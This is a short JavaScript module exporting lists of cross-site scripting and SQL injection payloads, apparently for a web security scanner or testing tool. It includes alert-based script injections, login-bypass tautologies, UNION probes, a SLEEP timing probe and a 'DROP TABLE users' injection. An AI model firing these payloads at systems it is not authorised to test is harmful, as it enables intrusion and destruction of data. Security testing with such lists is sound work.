export const PAYLOADS = {
  xss: [
    "<script>alert('XSS')</script>",
    '"><script>alert("XSS")</script>',
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "javascript:alert('XSS')",
    "<iframe src=javascript:alert('XSS')>",
    "<body onload=alert('XSS')>",
    "<input onfocus=alert('XSS') autofocus>",
    "<marquee onstart=alert('XSS')>",
    "<details open ontoggle=alert('XSS')>",
  ],
  sqli: [
    "' OR '1'='1",
    "' OR 1=1--",
    "admin' --",
    "' UNION SELECT NULL--",
    "1' AND '1'='1",
    "' OR 'a'='a",
    "1; DROP TABLE users--",
    "' AND SLEEP(5)--",
    "' OR 1=1/*",
    "' UNION ALL SELECT NULL,NULL--",
  ],
};
